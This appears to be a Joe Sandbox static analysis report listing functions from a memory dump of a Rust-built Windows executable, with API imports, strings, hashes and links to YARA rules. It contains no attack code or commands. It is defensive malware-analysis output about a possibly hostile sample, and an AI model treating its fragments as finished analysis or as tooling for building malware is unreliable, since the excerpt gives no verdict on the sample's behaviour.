Instruction ID: 7eacdbe8ed9651c4450816b1fee99eeba193e8b0e9ffe26ba5d93c986d2bb360
Opcode Fuzzy Hash: 1c0334674d31efb89d2c775229443127f9b9b7c2417acaa84a4584124165a396
Instruction Fuzzy Hash: AA12D462E086D986EB709BA1C6047B962A6FB15B94F444135DF5CC77C5FF3CEA82A300

Function 00007FF63D2CCE90 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 143COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 00007FF63D2CCF65
abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00007FF63D282DBB), ref: 00007FF63D2CCF6B
RtlUnwindEx.KERNEL32 ref: 00007FF63D2CD081

Strings

CCG , xrefs: 00007FF63D2CCEFE
CCG!, xrefs: 00007FF63D2CCF58
CCG!, xrefs: 00007FF63D2CCEB9
CCG", xrefs: 00007FF63D2CCEF2
CCG , xrefs: 00007FF63D2CD0E6

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ExceptionRaiseUnwindabort
String ID: CCG $CCG $CCG!$CCG!$CCG"
API String ID: 4140830120-3297834124
Opcode ID: 5b03064af3b6d8731af220ef8859a2e5255f14cbf9f3f4a672e6e3727d19e028
Instruction ID: 30b2db611dd8909b816aa8b5fc04662a32fd5bf8a78b3efa318a35e09f5718d9
Opcode Fuzzy Hash: 5b03064af3b6d8731af220ef8859a2e5255f14cbf9f3f4a672e6e3727d19e028
Instruction Fuzzy Hash: 91518F72E18B8582E7608B55E9406AD7360F799B88F109236FF8D53758EF39D9C2D700

Function 00007FF63D259400 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 408COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF63D2594E9
GetCurrentDirectoryW.KERNEL32 ref: 00007FF63D2594F4
GetLastError.KERNEL32 ref: 00007FF63D259500
GetLastError.KERNEL32 ref: 00007FF63D259519
GetLastError.KERNEL32 ref: 00007FF63D2595B7
GetEnvironmentStringsW.KERNEL32 ref: 00007FF63D25965B
GetLastError.KERNEL32 ref: 00007FF63D25966F

Part of subcall function 00007FF63D2CD100: RtlCaptureContext.KERNEL32 ref: 00007FF63D2CD192
Part of subcall function 00007FF63D2CD100: RtlUnwindEx.KERNEL32 ref: 00007FF63D2CD1CF
Part of subcall function 00007FF63D2CD100: abort.MSVCRT ref: 00007FF63D2CD1D5
Part of subcall function 00007FF63D2CD100: RaiseException.KERNEL32 ref: 00007FF63D2CD212

Strings

Vars, xrefs: 00007FF63D259A2F
innerVarsOs, xrefs: 00007FF63D259A5C
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF63D259945, 00007FF63D25998B

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ErrorLast$CaptureContextCurrentDirectoryEnvironmentExceptionRaiseStringsUnwindabort
String ID: Vars$called `Result::unwrap()` on an `Err` value$innerVarsOs
API String ID: 1982851867-2235028769
Opcode ID: 81f0b5ad55a65d210555d28c0575d3fbac638c4c01551ab7b438c5771c1c0d3a
Instruction ID: ca0443d52b9dccc71d2f6dd4955b977fa07d814523d430c234d10dea876b8e42
Opcode Fuzzy Hash: 81f0b5ad55a65d210555d28c0575d3fbac638c4c01551ab7b438c5771c1c0d3a
Instruction Fuzzy Hash: BBF1E3A2E08B9A89FB208FA1E900BF86765BB05798F444131EF5D97789EF7CD651D300

Function 00007FF63D26CE70 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 177synchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF63D26CE9C
CloseHandle.KERNEL32 ref: 00007FF63D26CF81
WaitForSingleObject.KERNEL32 ref: 00007FF63D26CF99
GetLastError.KERNEL32 ref: 00007FF63D26CFA2
GetExitCodeProcess.KERNEL32 ref: 00007FF63D26D000
CloseHandle.KERNEL32 ref: 00007FF63D26D059
CloseHandle.KERNEL32 ref: 00007FF63D26D061
CloseHandle.KERNEL32 ref: 00007FF63D26D10F

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF63D26CF20, 00007FF63D26D087, 00007FF63D26D0B5

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 17306042-2333694755
Opcode ID: d33dcf1d3dad1fb8fe8917b51f904eba1374b1cf089e9f9d342b2c8e17241b08
Instruction ID: f945726ffe978e4f953d53d91ca1a31265f173610468cc7331c1702d086e0bcb
Opcode Fuzzy Hash: d33dcf1d3dad1fb8fe8917b51f904eba1374b1cf089e9f9d342b2c8e17241b08
Instruction Fuzzy Hash: 97812B72A08B4A85FB109BA1D6503BD33A1FB84798F044535EF4D97B89EFBCE554A380

Function 00007FF63D245EA0 Relevance: 15.5, APIs: 8, Strings: 2, Instructions: 483COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF63D245F2E
memcpy.MSVCRT ref: 00007FF63D245F65
memcpy.MSVCRT ref: 00007FF63D24642B
memcpy.MSVCRT ref: 00007FF63D24649F
memcpy.MSVCRT ref: 00007FF63D2464D7

Strings

assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}, xrefs: 00007FF63D246833
assertion failed: new_left_len <= CAPACITY, xrefs: 00007FF63D246263

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memcpy
String ID: assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: new_left_len <= CAPACITY
API String ID: 3510742995-2079967719
Opcode ID: 857e78b8965fadb09579569978df2369435fc3f52ba0ba4689f9be7771eada54
Instruction ID: 8da86629dbc68ee06f713b5186d9f74df20f8c2d097c8ce8374b8243f1b0add7
Opcode Fuzzy Hash: 857e78b8965fadb09579569978df2369435fc3f52ba0ba4689f9be7771eada54
Instruction Fuzzy Hash: 00428C32A14BC585E721CF64E8403E933B8FB58B88F548226DF8D9B795EF799295D300

Function 00007FF63D280EF0 Relevance: 15.3, APIs: 10, Instructions: 317COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(-7FFFFFFFFFFFFF58,?,00001000,?,-7FFFFFFFFFFFFF58,?,00000000,00001FF0), ref: 00007FF63D280F1F
GetLastError.KERNEL32(-7FFFFFFFFFFFFF58,?,00001000,?,-7FFFFFFFFFFFFF58,?,00000000,00001FF0), ref: 00007FF63D280F2F
memcpy.MSVCRT ref: 00007FF63D280FA6
memcpy.MSVCRT ref: 00007FF63D280FC0
WideCharToMultiByte.KERNEL32 ref: 00007FF63D2810C1
CloseHandle.KERNEL32 ref: 00007FF63D281193
SetLastError.KERNEL32(00007FF63D2645B3), ref: 00007FF63D281252
ReadConsoleW.KERNEL32(00007FF63D2645B3), ref: 00007FF63D281268
GetLastError.KERNEL32(00007FF63D2645B3), ref: 00007FF63D281278

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ErrorLast$Handlememcpy$ByteCharCloseConsoleMultiReadWide
String ID:
API String ID: 1487844572-0
Opcode ID: 57efc7f10557e96ccbab4820113668ae5cd50f6de5f7ff16d2fb47a5723e845d
Instruction ID: 3467bb788204a3b2cfec058da708282ffc2583162850bc2d88cb65a308c47ea7
Opcode Fuzzy Hash: 57efc7f10557e96ccbab4820113668ae5cd50f6de5f7ff16d2fb47a5723e845d
Instruction Fuzzy Hash: 95C1E462F0869A45FB21DBE19A003F966A1AF44B94F448531EF0DD7BC9FE3CE585A310

Function 00007FF63D27FBB7 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 238COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF63D27FBCE
DuplicateHandle.KERNEL32 ref: 00007FF63D27FBF8
GetCurrentProcess.KERNEL32 ref: 00007FF63D27FD43
DuplicateHandle.KERNEL32 ref: 00007FF63D27FD6D
GetLastError.KERNEL32 ref: 00007FF63D27FD7C
CloseHandle.KERNEL32 ref: 00007FF63D27FDB4

Strings

cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs, xrefs: 00007FF63D2800ED
failed to spawn thread, xrefs: 00007FF63D2800C0
RUST_MIN_STACK, xrefs: 00007FF63D27FE15

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: Handle$CurrentDuplicateProcess$CloseErrorLast
String ID: RUST_MIN_STACK$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs$failed to spawn thread
API String ID: 120317985-141927316
Opcode ID: 33c01649a479cf9f13bc2aed1aa42619e88183e4b36295e1086b4b6008fb862b
Instruction ID: e6c7045f94ebef66c4f89260849fa8b238da0eb3e79e5b7b1d3009dabf3fa530
Opcode Fuzzy Hash: 33c01649a479cf9f13bc2aed1aa42619e88183e4b36295e1086b4b6008fb862b
Instruction Fuzzy Hash: CAB17F22A09B8A95F7219FA0DA003B927A0FB44788F404536EF9D93796EF3CE545E340

Function 00007FF63D29D44B Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00007FF63D29D4EE
memcmp.MSVCRT ref: 00007FF63D29D508
memcmp.MSVCRT ref: 00007FF63D29D522
memcmp.MSVCRT ref: 00007FF63D29D53C
memcmp.MSVCRT ref: 00007FF63D29D556
memcmp.MSVCRT ref: 00007FF63D29D570
memcmp.MSVCRT ref: 00007FF63D29D58A
memcmp.MSVCRT ref: 00007FF63D29D5A4

Strings

k0k1k2k3k4k5k6k7r0r1r2r3r4r5r6r7r16r17r18r19r20r21r22r23r24r25r26r27r28r29r30r31lrctrcr0cr1cr2cr3cr4cr5cr6cr7xervr0vr1vr2vr3vr4vr5vr6vr7vr8vr9vr10vr11vr12vr13vr14vr15vr16vr17vr18vr19vr20vr21vr22vr23vr24vr25vr26vr27vr28vr29vr30vr31vscrtfhartfiartexasrDW_SECT_IN, xrefs: 00007FF63D29D4DB

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memcmp
String ID: k0k1k2k3k4k5k6k7r0r1r2r3r4r5r6r7r16r17r18r19r20r21r22r23r24r25r26r27r28r29r30r31lrctrcr0cr1cr2cr3cr4cr5cr6cr7xervr0vr1vr2vr3vr4vr5vr6vr7vr8vr9vr10vr11vr12vr13vr14vr15vr16vr17vr18vr19vr20vr21vr22vr23vr24vr25vr26vr27vr28vr29vr30vr31vscrtfhartfiartexasrDW_SECT_IN
API String ID: 1475443563-2406371666
Opcode ID: 46757cf382599927a8d4a0aabcd9331590dbb94c894263678a18449331760e8c
Instruction ID: af94b41ef3a7c5a707211bbbc991657a1923d83562336c20c0395fee0039e67c
Opcode Fuzzy Hash: 46757cf382599927a8d4a0aabcd9331590dbb94c894263678a18449331760e8c
Instruction Fuzzy Hash: 19416A5AE0D25B80F6206ED6E7801B811528F11B89F646432EF0EC7BD5FE7EE951F221

Function 00007FF63D285E00 Relevance: 12.7, APIs: 10, Instructions: 158COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00007FF63D285E50
TlsSetValue.KERNEL32 ref: 00007FF63D285E63
TlsGetValue.KERNEL32 ref: 00007FF63D285EB0
TlsSetValue.KERNEL32 ref: 00007FF63D285EC3
TlsGetValue.KERNEL32 ref: 00007FF63D285F10
TlsSetValue.KERNEL32 ref: 00007FF63D285F23
TlsGetValue.KERNEL32 ref: 00007FF63D285F60
TlsSetValue.KERNEL32 ref: 00007FF63D285F73
TlsGetValue.KERNEL32 ref: 00007FF63D285FBC
TlsSetValue.KERNEL32 ref: 00007FF63D285FCD

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 1de102185da3bb913713fa39b87b29e93cb6e956dc5f28ed214f9f23d1630ec3
Instruction ID: 691009aa87042efb0c6337dc7c94afd27b4e55aec3c2de3dbeae5409eec30bc0
Opcode Fuzzy Hash: 1de102185da3bb913713fa39b87b29e93cb6e956dc5f28ed214f9f23d1630ec3
Instruction Fuzzy Hash: 81514C21F0A65A4AFA599A9287013785392AF56F80F4C8035DF1CD7B89FF3CFC52A244

Function 00007FF63D2CD7A0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 138COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FF63D2CD8BB

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF63D2CD951
Address %p has no image-section, xrefs: 00007FF63D2CD812, 00007FF63D2CD965
Mingw-w64 runtime failure:, xrefs: 00007FF63D2CD7D7
VirtualProtect failed with code 0x%x, xrefs: 00007FF63D2CD92E

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: 4fd57c9b88b693a7d41eaaea85bb8feca93a6b3e80787ddb801d584a8055ed59
Instruction ID: 6c5b9e73c5f7801453e48fb520a567b093a6592a27f8741a6a2dbaa836c0a52e
Opcode Fuzzy Hash: 4fd57c9b88b693a7d41eaaea85bb8feca93a6b3e80787ddb801d584a8055ed59
Instruction Fuzzy Hash: 82517476F0864E91EA109B91E9406A9B7A4FB89BD4F448131DF4C873A4FE3CED46E740

Function 00007FF63D26EE90 Relevance: 12.1, APIs: 8, Instructions: 127fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF63D26EECD
WriteFileEx.KERNEL32 ref: 00007FF63D26EF7C
SleepEx.KERNEL32 ref: 00007FF63D26EF9A
GetLastError.KERNEL32 ref: 00007FF63D26EFFF
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00007FF63D236745), ref: 00007FF63D26F034
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00007FF63D236745), ref: 00007FF63D26F03C
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00007FF63D236745), ref: 00007FF63D26F0A2
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00007FF63D236745), ref: 00007FF63D26F0AA

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: CloseHandle$ErrorFileLastSleepWritememset
String ID:
API String ID: 2935194761-0
Opcode ID: 2c9eda2ba5425f3b16ec9e19e8b7d738eab704e9fa1ec5dce05788a9c2aadb5d
Instruction ID: c75adef3d3cbeb81d1ffc5e882092bcaf80c6413b4b57430ca048b314614b996
Opcode Fuzzy Hash: 2c9eda2ba5425f3b16ec9e19e8b7d738eab704e9fa1ec5dce05788a9c2aadb5d
Instruction Fuzzy Hash: 5251A522A046CA85EB31EB619A017FD2290FF447D8F448531EE5D8BFCDEE7C9685A300

Function 00007FF63D267C60 Relevance: 12.1, APIs: 8, Instructions: 70networkCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF63D267C84
WSASocketW.WS2_32 ref: 00007FF63D267CC5
WSAGetLastError.WS2_32 ref: 00007FF63D267CD7
WSASocketW.WS2_32 ref: 00007FF63D267D0A
SetHandleInformation.KERNEL32 ref: 00007FF63D267D23
GetLastError.KERNEL32 ref: 00007FF63D267D2C
closesocket.WS2_32 ref: 00007FF63D267D36
WSAGetLastError.WS2_32 ref: 00007FF63D267D3F

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ErrorLast$Socket$HandleInformationclosesocketmemset
String ID:
API String ID: 3407399761-0
Opcode ID: 9fae1a40f16f2f3957333c6efa841f139f9f280d079620cbfc37dba620905ab4
Instruction ID: f7abd5261610743a1ebcb531a58f48f01e7291536d98462702db986f4f4fe17b
Opcode Fuzzy Hash: 9fae1a40f16f2f3957333c6efa841f139f9f280d079620cbfc37dba620905ab4
Instruction Fuzzy Hash: 5D21CE21E085594AF720EAB1E2003BD26509B847F4F144730EB2CD7BC9FE6DED46A750

Function 00007FF63D2993AE Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 55COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00007FF63D299423
memcmp.MSVCRT ref: 00007FF63D29943D

Strings

SPSR_SVC, xrefs: 00007FF63D2993FD
SPSR_UND, xrefs: 00007FF63D2993EA
SPSR_IRQ, xrefs: 00007FF63D2993C4
SPSR_ABT, xrefs: 00007FF63D2993D7
TPIDRUROTPIDRURWTPIDPRHTPIDPRSPLRPCACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPI, xrefs: 00007FF63D299410
SPSR_FIQ, xrefs: 00007FF63D2993B1

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memcmp
String ID: SPSR_ABT$SPSR_FIQ$SPSR_IRQ$SPSR_SVC$SPSR_UND$TPIDRUROTPIDRURWTPIDPRHTPIDPRSPLRPCACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPI
API String ID: 1475443563-2082546588
Opcode ID: f5176a462027b55d940c15e46d0c21bb11bd80f3f09bc554bb613763e8c96442
Instruction ID: 74d2f28506ce526fe6719c06b0f38b1da1fddd53c956fe3d6cbfea6e9854a86f
Opcode Fuzzy Hash: f5176a462027b55d940c15e46d0c21bb11bd80f3f09bc554bb613763e8c96442
Instruction Fuzzy Hash: 0B116DE6E0E54E80ED220DE762503B80194AF04FE5E147435DB4EE73D0FD3EA966B265

Function 00007FF63D259C40 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF63D259D6A
GetEnvironmentVariableW.KERNEL32 ref: 00007FF63D259D7C
GetLastError.KERNEL32 ref: 00007FF63D259D88
GetLastError.KERNEL32 ref: 00007FF63D259DA1

Strings

environment variable not foundenvironment variable was not valid unicode: , xrefs: 00007FF63D259FC5

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ErrorLast$EnvironmentVariable
String ID: environment variable not foundenvironment variable was not valid unicode:
API String ID: 2691138088-3632183283
Opcode ID: 0342860675461f0b20e08d9a2fdbebe81f3f7dcae1fddb8a0acb782e836da0a9
